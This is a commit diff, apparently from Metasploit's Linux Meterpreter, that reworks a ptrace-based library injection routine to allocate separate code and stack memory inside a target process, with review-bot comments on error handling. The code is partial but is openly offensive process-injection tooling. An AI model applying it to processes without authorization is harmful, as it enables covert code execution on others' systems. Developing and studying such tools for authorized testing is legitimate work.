
Create new code memory

This commit is contained in:
jvazquez-r7 2015-01-02 12:48:00 -06:00
parent 79692d5986
commit 63e993c735
2 changed files with 33 additions and 8 deletions


@ -84,11 +84,12 @@ save_state(LONG pid, state *s) {
* @brief Restores the process state and detaches.
* @param pid Process identifier to restore.
* @param s Pointer to \c state with code and registers.
* @param only_memory Idicates if restore only memory at EIP or also registers
* @returns Indication of success or failure.
* @retval 0 Indicates success.
*/
LONG
restore_state(LONG pid, state *s) {
restore_state(LONG pid, state *s, int only_memory) {
unsigned long *mem_ptr = NULL;
LONG i = 0;
LONG result = 0;
@ -105,6 +106,9 @@ restore_state(LONG pid, state *s) {
if (result != 0)
return result;
if (only_memory > 0)
return 0;
result = setregs(pid, &(s->regs));
if (result != 0)
return result;
@ -250,6 +254,8 @@ call(LONG pid, struct user_regs_struct *regs, unsigned long addr) {
LONG
inject_library(LONG pid, library *l) {
state s;
long code_mem;
long stack_mem;
struct user_regs_struct regs;
ULONG library_size = _SIZE_OF(l->length);
unsigned long *buf_ptr = (unsigned long *)l->data;
@ -260,7 +266,6 @@ inject_library(LONG pid, library *l) {
goto end;
}
dprintf("[INJECT] Saving state");
result = attach(pid);
if (result != 0)
@ -272,14 +277,31 @@ inject_library(LONG pid, library *l) {
memcpy(&regs, &(s.regs), sizeof(struct user_regs_struct));
dprintf("[INJECT] Creating new code memory");
result = allocate(pid, &regs, NULL, CODE_SIZE);
if (result != 0)
goto restore;
dprintf("[INJECT] New code memory on 0x%x, fixing registers", regs.eax);
code_mem = regs.eax;
regs.eip = code_mem;
result = setregs(pid, &regs);
if (result != 0)
goto restore;
dprintf("[INJECT] Restoring code on original process");
restore_state(pid, &s, 1);
dprintf("[INJECT] Creating new stack");
result = allocate(pid, &regs, NULL, STACK_SIZE);
result = allocate(pid, &regs, NULL, STACK_SIZE);
if (result != 0)
goto restore;
dprintf("[INJECT] New stack on 0x%x, fixing registers", regs.eax);
regs.esp = regs.eax + STACK_SIZE;
regs.eip = s.regs.eip;
stack_mem = regs.eax + STACK_SIZE;
regs.esp = stack_mem;//regs.eax + STACK_SIZE;
regs.eip = code_mem;//s.regs.eip;
result = setregs(pid, &regs);
if (result != 0)
@ -301,7 +323,8 @@ inject_library(LONG pid, library *l) {
goto restore;
dprintf("[INJECT] Fixing registers");
regs.eip = s.regs.eip;
regs.esp = stack_mem;
regs.eip = code_mem;//s.regs.eip;
result = setregs(pid, &regs);
if (result != 0)
goto restore;
@ -316,7 +339,7 @@ inject_library(LONG pid, library *l) {
goto end;
restore:
restore_state(pid, &s);
restore_state(pid, &s, 0);
end:
return result;
}
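Review bot: The return value of the new `restore_state(pid, &s, 1);` call after `dprintf("[INJECT] Restoring code on original process")` is discarded, while every other ptrace step in inject_library assigns `result` and jumps to `restore` on failure; if the original code at EIP cannot be written back, the function goes on to allocate the stack and run with the target's code still overwritten. Writing `result = restore_state(pid, &s, 1); if (result != 0) goto restore;` keeps the error handling consistent with the surrounding steps and still reaches the full `restore_state(pid, &s, 0)` at the end. The new assignments `regs.esp = stack_mem;//regs.eax + STACK_SIZE;` and `regs.eip = code_mem;//s.regs.eip;` (repeated in the later hunk) carry the replaced expressions as trailing comments; drop the commented-out code rather than keeping it next to the live value. In restore_state the `if (only_memory > 0) return 0;` path returns before setregs and before whatever follows it, which is outside the hunk; if the detach named in its `@brief` lives there, the `@param only_memory` line (which also misspells "Indicates") should state that the early path leaves the target attached, since inject_library relies on that to keep working on the process afterwards. Parts of inject_library's body fall between the hunks.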


@ -31,6 +31,8 @@
#define ENTRY_POINT_POS 11
/*! Length of the new stack to allocate */
#define STACK_SIZE 0x200000
/*! Length of the new memory to store code stubs */
#define CODE_SIZE 0x1000
/*! @brief Container struct for a library to inject and execute. */
typedef struct {
@ -52,7 +54,7 @@ typedef struct {
} state;
LONG save_state(LONG pid, state *s);
LONG restore_state(LONG pid, state *s);
LONG restore_state(LONG pid, state *s, int only_memory);
BOOL wait_trap(LONG pid);
LONG execute_stub(LONG pid, unsigned long addr, unsigned long *stub, ULONG stub_size);
LONG allocate(LONG pid, struct user_regs_struct *regs, unsigned long addr, size_t length);
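Review bot: The new prototype `LONG restore_state(LONG pid, state *s, int only_memory);` introduces a flag whose meaning is documented only in the .c file, and the parameter is typed `int` although the implementation tests it as `only_memory > 0`, so a negative value silently behaves like 0. A one-line comment on the declaration such as `/*! only_memory > 0: restore only the code at EIP and skip setregs */` gives header readers the contract, and typing the flag `BOOL` (which this header already uses for wait_trap) with an `if (only_memory)` check in the implementation would remove the negative-value ambiguity. What restore_state does after that early return is outside the hunk, so the comment should stay limited to the setregs behaviour that is visible.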